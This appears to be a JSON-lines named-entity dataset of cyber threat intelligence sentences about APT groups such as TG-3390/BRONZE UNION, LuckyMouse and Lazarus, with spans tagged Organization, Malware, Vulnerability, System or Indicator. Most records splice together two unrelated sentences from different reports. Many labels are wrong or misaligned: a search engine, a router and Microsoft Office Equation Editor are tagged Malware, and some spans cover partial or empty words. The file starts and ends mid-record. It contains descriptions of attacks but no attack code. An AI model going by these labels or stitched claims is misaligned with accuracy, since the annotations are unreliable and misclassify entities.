In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": [{"start": 204, "end": 217, "label": "Vulnerability"}, {"start": 285, "end": 305, "label": "Malware"}, {"start": 312, "end": 325, "label": "Vulnerability"}, {"start": 347, "end": 352, "label": "Malware"}, {"start": 453, "end": 460, "label": "Vulnerability"}]} {"text": "On Tuesday , Arbor Networks said that it has new leads on a credential stealing remote access Trojan ( RAT ) called Ismdoor , possibly used by Greenbug to steal credentials on Shamoon 's behalf . TG-3390 uses DLL side loading , a technique that involves running a legitimate , typically digitally signed , program that loads a malicious DLL .", "spans": [{"start": 13, "end": 27, "label": "Organization"}, {"start": 94, "end": 100, "label": "System"}, {"start": 103, "end": 106, "label": "System"}, {"start": 116, "end": 123, "label": "System"}, {"start": 196, "end": 203, "label": "Organization"}, {"start": 337, "end": 340, "label": "System"}]} {"text": "It's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost . 
CTU researchers have observed the Threat Group-3390 employing legitimate Kaspersky antivirus variants in analyzed samples .", "spans": [{"start": 26, "end": 52, "label": "System"}, {"start": 183, "end": 202, "label": "Organization"}, {"start": 239, "end": 242, "label": "Organization"}, {"start": 273, "end": 290, "label": "Organization"}, {"start": 312, "end": 321, "label": "Organization"}]} {"text": "t's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost . The adversaries have used this technique to allow PlugX and HTTPBrowser to persist on a system .", "spans": [{"start": 25, "end": 51, "label": "System"}, {"start": 182, "end": 201, "label": "Organization"}, {"start": 288, "end": 293, "label": "Malware"}, {"start": 298, "end": 309, "label": "Malware"}]} {"text": "In the context of the Ismdoor RAT , the DNS attack technique is used primarily by Greenbug for stealing credentials . CTU researchers have observed the TG-3390 employing legitimate Kaspersky antivirus variants in analyzed samples .", "spans": [{"start": 22, "end": 33, "label": "System"}, {"start": 118, "end": 121, "label": "Organization"}, {"start": 152, "end": 159, "label": "Organization"}, {"start": 181, "end": 190, "label": "Organization"}]} {"text": "According to the security experts , this collection of malware was discovered after their first initial report was published , meaning that Group 27 ignored the fact they were unmasked and continued to infect their targets regardless , through the same entry point , the Myanmar Union Election Commission ( UEC ) website . 
TG-3390 actors have deployed the OwaAuth web shell to Exchange servers , disguising it as an ISAPI filter .", "spans": [{"start": 271, "end": 304, "label": "Organization"}, {"start": 307, "end": 310, "label": "Organization"}, {"start": 323, "end": 330, "label": "Organization"}, {"start": 356, "end": 373, "label": "Malware"}]} {"text": "The attackers compromised two legitimate Thai websites to host the malware , which is a tactic this group has used in the past . In other cases , threat actors placed web shells on externally accessible servers , sometimes behind a reverse proxy , to execute commands on the compromised system .", "spans": [{"start": 30, "end": 54, "label": "System"}, {"start": 167, "end": 177, "label": "Malware"}]} {"text": "We were not able to find additional tools , but the attackers again compromised a legitimate Thai website to host their malware , in this case the student portal for a Thai University . CTU researchers have discovered numerous details about TG-3390 operations , including how the adversaries explore a network , move laterally , and exfiltrate data .", "spans": [{"start": 186, "end": 189, "label": "Organization"}, {"start": 241, "end": 248, "label": "Organization"}]} {"text": "As we have seen in some previous targeted malware attacks , the attackers in this incident are taking advantage of services like changeip.com to establish free subdomains in their infrastructure . When the adversaries' operations are live , they modify the record again to point the C2 domain to an IP address they can access .", "spans": [{"start": 283, "end": 285, "label": "System"}, {"start": 299, "end": 301, "label": "Indicator"}]} {"text": "Blending in with legitimate traffic is a common tactic used by attackers to help fly under the radar . 
They then identify the Exchange server and attempt to install the OwaAuth web shell .", "spans": [{"start": 17, "end": 35, "label": "System"}, {"start": 169, "end": 186, "label": "Malware"}]} {"text": "The Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information . If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail , TG-3390 identify other externally accessible servers and deploy ChinaChopper web shells .", "spans": [{"start": 4, "end": 21, "label": "Organization"}, {"start": 91, "end": 98, "label": "System"}, {"start": 160, "end": 177, "label": "Malware"}, {"start": 257, "end": 264, "label": "Organization"}]} {"text": "he Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information . After compromising an initial victim 's system ( patient 0 ) , the threat actors use the Baidu search engine to search for the victim 's organization name .", "spans": [{"start": 3, "end": 20, "label": "Organization"}, {"start": 90, "end": 97, "label": "System"}, {"start": 241, "end": 260, "label": "Malware"}]} {"text": "In another modification , first observed in the most recent October 11 Parliamentarian operation ( version agewkassif ) , the developer (s ) of KeyBoy began using a string obfuscation routine in order to hide many of the critical values referenced within the malware . CTU researchers discovered the threat actors searching for \" [company] login \" , which directed them to the landing page for remote access .", "spans": [{"start": 144, "end": 150, "label": "System"}, {"start": 165, "end": 191, "label": "System"}, {"start": 269, "end": 272, "label": "Organization"}]} {"text": "To control the full operation , MoneyTaker uses a Pentest framework Server . 
TG-3390 actors keep track of and leverage existing ASPXTool web shells in their operations , preferring to issue commands via an internally accessible Web shell rather than HTTPBrowser or PlugX .", "spans": [{"start": 32, "end": 42, "label": "Organization"}, {"start": 50, "end": 74, "label": "System"}, {"start": 77, "end": 84, "label": "Organization"}, {"start": 128, "end": 147, "label": "Malware"}, {"start": 228, "end": 237, "label": "System"}, {"start": 250, "end": 261, "label": "Malware"}, {"start": 265, "end": 270, "label": "Malware"}]} {"text": "At the end of June 2015 Mofang started its campaign to gather information of a specific target in relation to the sezs : the cpg Corporation . Within six hours of entering the environment , the threat actors compromised multiple systems and stole credentials for the entire domain .", "spans": [{"start": 125, "end": 140, "label": "Organization"}]} {"text": "After successfully infecting one of the computers and gaining initial access to the system , the attackers perform reconnaissance of the local network in order to gain domain administrator privileges and eventually consolidate control over the network . Despite multiple public disclosures of their activities , BRONZE UNION remains an active and formidable threat as of this publication .", "spans": []} {"text": "This newly observed activity uses a series of redirections and fileless , malicious implementations of legitimate tools to gain access to the targeted systems . 
In 2015 , the SecureWorks\u00ae Counter Threat Unit\u2122 ( CTU ) research team documented the BRONZE UNION threat group ( formerly labeled TG-3390 ) , which CTU\u2122 analysis suggests is based in the People's Republic of China ( PRC ) .", "spans": [{"start": 175, "end": 208, "label": "Organization"}, {"start": 211, "end": 214, "label": "Organization"}, {"start": 291, "end": 298, "label": "Organization"}, {"start": 309, "end": 313, "label": "Organization"}, {"start": 348, "end": 374, "label": "Organization"}, {"start": 377, "end": 380, "label": "Organization"}]} {"text": "The goal of the attackers appears to be to collect intellectual property such as design documents , formulas , and manufacturing processes . After reestablishing access , the adversaries download tools such as gsecudmp and WCE that are staged temporarily on websites that TG-3390 previously compromised but never used .", "spans": [{"start": 210, "end": 218, "label": "Malware"}, {"start": 223, "end": 226, "label": "Malware"}, {"start": 272, "end": 279, "label": "Organization"}]} {"text": "The purpose of the attacks appears to be industrial espionage , collecting intellectual property for competitive advantage . In 2015 , the SecureWorks documented the BRONZE UNION threat group ( formerly labeled TG-3390 ) , which CTU analysis suggests is based in the People's Republic of China ( PRC ) .", "spans": [{"start": 139, "end": 150, "label": "Organization"}, {"start": 166, "end": 178, "label": "Organization"}, {"start": 211, "end": 218, "label": "Organization"}, {"start": 229, "end": 232, "label": "Organization"}, {"start": 267, "end": 284, "label": "Organization"}]} {"text": "This particular threat was also used by hackers to compromise a Korean social network site to steal records of 35 million users . 
BRONZE UNION threat campaigns that illustrate the evolution of the group 's methods and espionage objectives .", "spans": []} {"text": "These attacks are primarily targeting private industry in search of key intellectual property for competitive advantage , military institutions , and governmental organizations often in search of documents related to current political events and human rights organizations . Based on BRONZE UNION 's targeting activity , CTU researchers assess it is highly likely that the group focuses on political and defense organization networks .", "spans": [{"start": 38, "end": 54, "label": "Organization"}, {"start": 122, "end": 143, "label": "Organization"}, {"start": 150, "end": 176, "label": "Organization"}, {"start": 225, "end": 234, "label": "Organization"}, {"start": 246, "end": 272, "label": "Organization"}, {"start": 321, "end": 324, "label": "Organization"}, {"start": 390, "end": 399, "label": "Organization"}, {"start": 404, "end": 424, "label": "Organization"}]} {"text": "Nitro 's campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes . this SWC was used to specifically target Turkish .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 33, "end": 48, "label": "Organization"}]} {"text": "This attack campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes . 
In 2016 , the threat actors conducted a strategic web compromise ( SWC ) on the website of an international industry organization that affected aerospace , academic , media , technology , government , and utilities organizations around the world .", "spans": [{"start": 36, "end": 51, "label": "Organization"}, {"start": 264, "end": 299, "label": "Organization"}, {"start": 314, "end": 323, "label": "Organization"}, {"start": 326, "end": 334, "label": "Organization"}, {"start": 337, "end": 342, "label": "Organization"}, {"start": 345, "end": 355, "label": "Organization"}, {"start": 358, "end": 368, "label": "Organization"}, {"start": 375, "end": 398, "label": "Organization"}]} {"text": "Examples of notable Potao dissemination techniques , some of which were previously unseen , or at least relatively uncommon , include the use of highly-targeted spear-phishing SMS messages to drive potential victims to malware download sites and USB worm functionality that tricked the user into ' willingly ' executing the trojan . In addition , BRONZE UNION activity on multiple U.S.-based defense manufacturer networks included the threat actors seeking information associated with aerospace technologies , combat processes , and naval defense systems .", "spans": [{"start": 20, "end": 25, "label": "System"}, {"start": 381, "end": 399, "label": "Organization"}, {"start": 485, "end": 507, "label": "Organization"}, {"start": 510, "end": 526, "label": "Organization"}, {"start": 533, "end": 554, "label": "Organization"}]} {"text": "The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates . 
this SWC was used to specifically target Turkish goverment .", "spans": [{"start": 4, "end": 16, "label": "Organization"}]} {"text": "The PassCV group continues to be extremely effective in compromising both small and large game companies and surreptitiously using their code-signing certificates to infect an even larger swath of organizations . Since that analysis , CTU researchers have observed multiple BRONZE UNION threat campaigns that illustrate the evolution of the group 's methods and espionage objectives .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 90, "end": 104, "label": "Organization"}, {"start": 235, "end": 238, "label": "Organization"}]} {"text": "The ScarCruft group keeps expanding its exfiltration targets to steal further information from infected hosts and continues to create tools for additional data exfiltration . this SWC was used to specifically target Turkish banking .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 224, "end": 231, "label": "Organization"}]} {"text": "Financially motivated APT groups which focus efforts on targeted attacks on the financial sector such as \u2014 Anunak , Corkow , Buhtrap \u2014 usually managed botnets using developed or modified banking Trojans . this SWC was used to specifically target Turkish academic networks .", "spans": [{"start": 80, "end": 96, "label": "Organization"}, {"start": 116, "end": 122, "label": "System"}, {"start": 187, "end": 194, "label": "Organization"}]} {"text": "They are selective in their attacks and wait for about three months between incidents , which is approximately three times longer than other financially motivated APT groups , like MoneyTaker , Anunak ( Carbanak ) , Buhtrap or Cobalt . 
BRONZE UNION has consistently demonstrated the capability to conduct successful large-scale intrusions against high-profile networks and systems .", "spans": []} {"text": "The company specializes in finance and natural resources specific to that region . The threat actors appear to be able to create and leverage multiple SWCs in parallel .", "spans": [{"start": 27, "end": 34, "label": "Organization"}, {"start": 151, "end": 155, "label": "Malware"}]} {"text": "Based on the profile of the victims and the type of information targeted by the attackers , Symantec believes that Butterfly is financially motivated , stealing information it can potentially profit from . In a separate incident , CTU researchers identified a file named s.txt , which is consistent with the output of the Netview host-enumeration tool .", "spans": [{"start": 92, "end": 100, "label": "Organization"}, {"start": 231, "end": 234, "label": "Organization"}, {"start": 271, "end": 276, "label": "Indicator"}]} {"text": "Fxmsp specialize in breaching highly secure protected networks to access private corporate and government information . BRONZE UNION actors leveraged initial web shell access on Internet-facing systems to conduct internal reconnaissance .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]} {"text": "But , thanks to the attackers known affection for decoy documents that pose as news summaries , we were able to date the campaign back to March 2018 . BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control ( C2 ) and operational infrastructure .", "spans": [{"start": 20, "end": 29, "label": "Organization"}, {"start": 212, "end": 214, "label": "Indicator"}, {"start": 240, "end": 243, "label": "System"}, {"start": 282, "end": 284, "label": "System"}]} {"text": "Donot attacked government agencies , aiming for classified intelligence . 
This script relays commands and output between the controller and the system .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 15, "end": 34, "label": "Organization"}]} {"text": "Lazarus is a very active attack group involved in both cyber crime and espionage . The threat actors used the appcmd command-line tool to unlock and disable the default logging component on the server ( systsm.webServer/httplogging ) and then delete existing logs from the system ( see Figure 4 ) .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 203, "end": 231, "label": "System"}]} {"text": "To make the fraudulent withdrawals , Lazarus first breaches targeted banks' networks and compromises the switch application servers handling ATM transactions . In 2016 , CTU researchers observed the group using native system .", "spans": [{"start": 37, "end": 44, "label": "Organization"}, {"start": 69, "end": 75, "label": "Organization"}, {"start": 170, "end": 173, "label": "Organization"}]} {"text": "The operation , known as FASTCash\u201d has enabled Lazarus to fraudulently empty ATMs of cash . In March 2018 we detected an ongoing campaign .", "spans": [{"start": 47, "end": 54, "label": "Organization"}]} {"text": "This malware in turn intercepts fraudulent Lazarus cash withdrawal requests and sends fake approval responses , allowing the attackers to steal cash from ATMs . TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems .", "spans": [{"start": 5, "end": 12, "label": "System"}, {"start": 43, "end": 50, "label": "Organization"}]} {"text": "The threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space . 
As of this publication , BRONZE UNION remains a formidable threat group that targets intellectual property and executes its operations at a swift pace .", "spans": [{"start": 4, "end": 17, "label": "Organization"}, {"start": 110, "end": 124, "label": "Malware"}]} {"text": "If an attacker was able to compromise an organization's network administrator credentials , the attacker would be able to change that particular organization's DNS records at will . we detected an ongoing campaign targeting a national data center .", "spans": [{"start": 6, "end": 14, "label": "Organization"}]} {"text": "If the attackers were able to obtain one of these EPP keys , they would be able to modify any DNS records that were managed by that particular registrar . The operators used the HyperBro Trojan as their last-stage in-memory remote administration tool ( RAT ) .", "spans": [{"start": 7, "end": 16, "label": "Organization"}, {"start": 178, "end": 193, "label": "Malware"}, {"start": 224, "end": 250, "label": "Malware"}, {"start": 253, "end": 256, "label": "Malware"}]} {"text": "Captured legitimate user credentials when users interacted with these actor - controlled servers . we detected an ongoing campaign targeting a national data center in the Centeral Asia .", "spans": [{"start": 70, "end": 75, "label": "Organization"}]} {"text": "During a typical incident , the actor would modify the NS records for the targeted organization , pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries . The tools found in this campaign , such as the HyperBro Trojan , are regularly used by a variety of Chinese-speaking actors .", "spans": [{"start": 32, "end": 37, "label": "Organization"}, {"start": 248, "end": 263, "label": "Malware"}]} {"text": "The next step for the actor was to build MitM servers that impersonated legitimate services to capture user credentials . 
Due to tools and tactics in use we attribute the campaign to LuckyMouse Chinese-speaking actor ( also known as EmissaryPanda and APT27 ) .", "spans": [{"start": 22, "end": 27, "label": "Organization"}, {"start": 41, "end": 53, "label": "System"}, {"start": 183, "end": 193, "label": "Organization"}, {"start": 233, "end": 246, "label": "Organization"}, {"start": 251, "end": 256, "label": "Organization"}]} {"text": "This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa) . It's possible TG-3390 used a waterhole to infect data center employees .", "spans": [{"start": 29, "end": 38, "label": "Organization"}, {"start": 150, "end": 157, "label": "Organization"}, {"start": 185, "end": 206, "label": "Organization"}]} {"text": "Obtaining access to this ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs . Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 ( Microsoft Office Equation Editor , widely used by Chinese-speaking actors since December 2017 ) , we can\u2032t prove they were related to this particular attack .", "spans": [{"start": 61, "end": 70, "label": "Organization"}, {"start": 182, "end": 196, "label": "Vulnerability"}, {"start": 199, "end": 231, "label": "Malware"}]} {"text": "Once they have access to the network , they steal the organization's legitimate SSL certificate and use it on actor-controlled servers . We suspect this router was hacked as part of the campaign in order to process the malware 's HTTP requests .", "spans": [{"start": 39, "end": 43, "label": "Organization"}, {"start": 110, "end": 126, "label": "System"}, {"start": 127, "end": 134, "label": "System"}, {"start": 153, "end": 159, "label": "Malware"}, {"start": 230, "end": 234, "label": "Indicator"}]} {"text": "The document exploited CVE-2012-0158 and will decode and write an executable to disk upon infection . 
In March 2017 , Wikileaks published details about an exploit affecting Mikrotik called ChimayRed .", "spans": [{"start": 23, "end": 36, "label": "Vulnerability"}, {"start": 118, "end": 127, "label": "Organization"}, {"start": 155, "end": 162, "label": "Vulnerability"}, {"start": 173, "end": 181, "label": "Malware"}, {"start": 189, "end": 198, "label": "Malware"}]} {"text": "iSiGHT Partners has tracked Sandworm Team for some time - and we publicly reported on some of their activities in October 2014 , when we discovered their use of a zero-day exploit , CVE-2014-4114 . There were traces of HyperBro in the infected data center from mid-November 2017 .", "spans": [{"start": 0, "end": 15, "label": "Organization"}, {"start": 28, "end": 41, "label": "Organization"}, {"start": 163, "end": 179, "label": "Vulnerability"}, {"start": 182, "end": 195, "label": "Vulnerability"}, {"start": 219, "end": 227, "label": "Malware"}]} {"text": "In July of 2015 , we identified a full e-mail uploaded to an antivirus scanning service that carried a Scarlet Mimic exploit document . In March 2017 , Wikileaks published details about an exploit affecting Mikrotik called ChimayRed .", "spans": [{"start": 103, "end": 124, "label": "Vulnerability"}, {"start": 152, "end": 161, "label": "Organization"}, {"start": 189, "end": 196, "label": "Vulnerability"}, {"start": 207, "end": 215, "label": "Malware"}, {"start": 223, "end": 232, "label": "Malware"}]} {"text": "The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated . 
This is a hacking group with Chinese origins which targets selected organisations related with education , energy and technology .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 15, "end": 46, "label": "System"}, {"start": 288, "end": 297, "label": "Organization"}, {"start": 300, "end": 306, "label": "Organization"}, {"start": 311, "end": 321, "label": "Organization"}]} {"text": "Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download . Usually , the delivered payload is either the well-known ' PlugX ' or ' HTTPBrowser ' RAT , a tool which is believed to have Chinese origins and to be used only by certain Chinese hacking groups .", "spans": [{"start": 71, "end": 84, "label": "Vulnerability"}, {"start": 100, "end": 115, "label": "Malware"}, {"start": 186, "end": 191, "label": "Malware"}, {"start": 199, "end": 210, "label": "Malware"}, {"start": 213, "end": 216, "label": "Malware"}]} {"text": "In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . Emissary Panda has used many ACTs with the most notable being the exploits from the Hacking Team leak .", "spans": [{"start": 44, "end": 59, "label": "Malware"}, {"start": 124, "end": 137, "label": "Vulnerability"}]} {"text": "As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . 
Emissary Panda is still active and continues to target selected organisations .", "spans": [{"start": 29, "end": 48, "label": "Malware"}, {"start": 60, "end": 73, "label": "Vulnerability"}, {"start": 99, "end": 116, "label": "System"}]} {"text": "FireEye believes that two actors \u2013 Turla and an unknown financially motivated actor \u2013 were using the first EPS zero-day CVE-2017-0261 , and APT28 was using the second EPS zero-day CVE-2017-0262 along with a new Escalation of Privilege (EOP) zero-day CVE-2017-0263 . Cybersecurity researchers have uncovered an espionage campaign that has targeted a national data center of an unnamed central Asian country in order to conduct watering hole attacks .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 26, "end": 32, "label": "Organization"}, {"start": 56, "end": 67, "label": "Organization"}, {"start": 120, "end": 133, "label": "Vulnerability"}, {"start": 140, "end": 145, "label": "Organization"}, {"start": 180, "end": 193, "label": "Vulnerability"}, {"start": 250, "end": 263, "label": "Vulnerability"}, {"start": 266, "end": 279, "label": "Organization"}]} {"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . The campaign is believed to be active covertly since fall 2017 .", "spans": [{"start": 12, "end": 29, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 199, "end": 206, "label": "Malware"}]} {"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx\u201d . 
LuckyMouse , also known as Iron Tiger , EmissaryPanda , APT 27 and Threat Group-3390 , is the same group of Chinese hackers who was found targeting Asian countries with Bitcoin mining malware early this year .", "spans": [{"start": 34, "end": 42, "label": "Malware"}, {"start": 49, "end": 86, "label": "Vulnerability"}, {"start": 89, "end": 99, "label": "Organization"}, {"start": 116, "end": 126, "label": "Organization"}, {"start": 129, "end": 142, "label": "Organization"}, {"start": 145, "end": 151, "label": "Organization"}, {"start": 156, "end": 173, "label": "Organization"}, {"start": 258, "end": 280, "label": "Malware"}]} {"text": "It is possible that CVE-2017-8759 was being used by additional actors . March by security researchers from Kaspersky Labs .", "spans": [{"start": 20, "end": 33, "label": "Vulnerability"}, {"start": 63, "end": 69, "label": "Organization"}, {"start": 107, "end": 121, "label": "Organization"}]} {"text": "The addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities . For example , at the end of 2016 CTU researchers observed the threat actors using native system functionality to disable logging processes and delete logs within a network .", "spans": [{"start": 20, "end": 31, "label": "Vulnerability"}, {"start": 43, "end": 53, "label": "System"}, {"start": 82, "end": 88, "label": "Organization"}, {"start": 157, "end": 160, "label": "Organization"}]} {"text": "The Magnitude EK landing page consisted of CVE-2016-0189 , which was first reported by FireEye as being used in Neutrino Exploit Kit after it was patched . 
The group has been active since at least 2010 and was behind many previous attack campaigns resulting in the theft of massive amounts of data from the directors and managers of US-based defense contractors .", "spans": [{"start": 4, "end": 16, "label": "System"}, {"start": 43, "end": 56, "label": "Vulnerability"}, {"start": 87, "end": 94, "label": "Organization"}, {"start": 112, "end": 132, "label": "System"}, {"start": 342, "end": 361, "label": "Organization"}]} {"text": "The malware leverages an exploit , codenamed EternalBlue\u201d , that was released by the Shadow Brokers on April 14 , 2017 . attacks to a Chinese-speaking threat actor group called LuckyMouse .", "spans": [{"start": 45, "end": 57, "label": "Vulnerability"}, {"start": 85, "end": 99, "label": "Organization"}]} {"text": "Some hackers even went onto use the Cisco exploits in the wild . LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) .", "spans": [{"start": 36, "end": 50, "label": "Vulnerability"}, {"start": 113, "end": 129, "label": "System"}, {"start": 146, "end": 160, "label": "Vulnerability"}]} {"text": "DanderSpritz is the framework for controlling infected machines , different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar . 
This time the group chose a national data center as its target from an unnamed country in Central Asia in an attempt to gain \" access to a wide range of government resources at one fell swoop \" .", "spans": [{"start": 0, "end": 12, "label": "System"}, {"start": 81, "end": 90, "label": "System"}, {"start": 196, "end": 211, "label": "System"}, {"start": 216, "end": 230, "label": "System"}, {"start": 235, "end": 245, "label": "System"}]} {"text": "In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . The initial attack vector used in the attack against the data center is unclear , but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center .", "spans": [{"start": 46, "end": 68, "label": "Vulnerability"}, {"start": 163, "end": 190, "label": "Malware"}, {"start": 195, "end": 203, "label": "Malware"}, {"start": 327, "end": 337, "label": "Organization"}, {"start": 431, "end": 440, "label": "Organization"}]} {"text": "On the other hand , ShadowBrokers group made headlines in 2016 when it claimed to have robbed various exploitation tools used by the NSA including the notorious ETERNALBLUE that was a vital component in the WannaCry ransomware campaign causing damages to systems worldwide . 
According to the researchers , the group injected malicious JavaScript code into the official government websites associated with the data center in order to conduct watering hole attacks .", "spans": [{"start": 133, "end": 136, "label": "Organization"}, {"start": 161, "end": 172, "label": "Vulnerability"}, {"start": 335, "end": 350, "label": "Malware"}]} {"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . the targeted system with a piece of malware called HyperBro , a Remote Access Trojan ( RAT ) .", "spans": [{"start": 90, "end": 123, "label": "Malware"}, {"start": 143, "end": 156, "label": "Vulnerability"}, {"start": 252, "end": 260, "label": "Malware"}, {"start": 265, "end": 285, "label": "Malware"}, {"start": 288, "end": 291, "label": "Malware"}]} {"text": "Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . The main command and control ( C&C ) server used in this attack is hosted on an IP address which belongs to a Ukrainian ISP , specifically to a MikroTik router running a firmware version released in March 2016 .", "spans": [{"start": 79, "end": 92, "label": "Vulnerability"}, {"start": 104, "end": 118, "label": "Malware"}, {"start": 152, "end": 155, "label": "System"}, {"start": 201, "end": 203, "label": "Indicator"}, {"start": 265, "end": 273, "label": "Malware"}]} {"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . 
the targets of the hacking group were in the automotive .", "spans": [{"start": 17, "end": 30, "label": "Organization"}, {"start": 153, "end": 179, "label": "Vulnerability"}, {"start": 227, "end": 237, "label": "Organization"}]} {"text": "In order to carry out this operation , it uses publicly available tools , including Mimikatz ( Hacktool.Mimikatz ) and an open-source tool that exploits a known Windows privilege escalation vulnerability ( CVE-2016-0051 ) on unpatched computers . Dell SecureWorks researchers unveiled a report on Threat Group-3390 that has targeted companies around the world while stealing massive amounts of industrial data .", "spans": [{"start": 47, "end": 71, "label": "System"}, {"start": 84, "end": 92, "label": "System"}, {"start": 95, "end": 112, "label": "System"}, {"start": 206, "end": 219, "label": "Vulnerability"}, {"start": 247, "end": 263, "label": "Organization"}, {"start": 304, "end": 314, "label": "Organization"}]} {"text": "Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . 
The group , believed to be based in China , has also targeted defense contractors , colleges and universities , law firms , and political organizations \u2014 including organizations related to Chinese minority ethnic groups .", "spans": [{"start": 54, "end": 64, "label": "System"}, {"start": 85, "end": 98, "label": "Malware"}, {"start": 123, "end": 136, "label": "Vulnerability"}, {"start": 139, "end": 148, "label": "Vulnerability"}, {"start": 149, "end": 156, "label": "Vulnerability"}, {"start": 223, "end": 242, "label": "Organization"}, {"start": 245, "end": 253, "label": "Organization"}, {"start": 258, "end": 270, "label": "Organization"}, {"start": 273, "end": 282, "label": "Organization"}, {"start": 289, "end": 312, "label": "Organization"}, {"start": 358, "end": 380, "label": "Organization"}]} {"text": "The Word document usually exploits CVE-2012-0158 . LAS VEGAS\u2014Today at the Black Hat information security conference , Dell SecureWorks researchers unveiled a report on a newly detected hacking group that has targeted companies around the world while stealing massive amounts of industrial data .", "spans": [{"start": 4, "end": 17, "label": "Malware"}, {"start": 35, "end": 48, "label": "Vulnerability"}, {"start": 118, "end": 134, "label": "Organization"}]} {"text": "Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . 
Designated as Threat Group 3390 and nicknamed \" Emissary Panda \" by researchers , the hacking group has compromised victims' networks largely through \" watering hole \" attacks launched from over 100 compromised legitimate websites , sites picked because they were known to be frequented by those targeted in the attack .", "spans": [{"start": 14, "end": 23, "label": "Organization"}, {"start": 32, "end": 54, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 110, "end": 127, "label": "Organization"}, {"start": 144, "end": 158, "label": "Organization"}]} {"text": "Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . the United Kingdom had data stolen by members of Emissary Panda .", "spans": [{"start": 10, "end": 19, "label": "Organization"}, {"start": 28, "end": 50, "label": "Malware"}, {"start": 76, "end": 89, "label": "Vulnerability"}, {"start": 141, "end": 155, "label": "Organization"}]} {"text": "The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . the US had data stolen by members of Emissary Panda .", "spans": [{"start": 29, "end": 36, "label": "Organization"}, {"start": 109, "end": 118, "label": "Malware"}, {"start": 133, "end": 146, "label": "Vulnerability"}, {"start": 151, "end": 164, "label": "Vulnerability"}, {"start": 220, "end": 234, "label": "Organization"}]} {"text": "One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . 
No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" \u2014 a near-year-old Java security hole \u2014 \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported .", "spans": [{"start": 40, "end": 57, "label": "Organization"}, {"start": 86, "end": 116, "label": "Malware"}, {"start": 159, "end": 172, "label": "Vulnerability"}, {"start": 180, "end": 188, "label": "Vulnerability"}, {"start": 301, "end": 314, "label": "Vulnerability"}, {"start": 362, "end": 375, "label": "Vulnerability"}, {"start": 408, "end": 425, "label": "Organization"}]} {"text": "The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components . The group used a number of tools common to other Chinese hacking groups , but they had a few unique tools of their own with interfaces developed for Standard ( Simplified ) Chinese .", "spans": [{"start": 46, "end": 61, "label": "System"}, {"start": 76, "end": 91, "label": "Malware"}, {"start": 203, "end": 216, "label": "Vulnerability"}]} {"text": "The 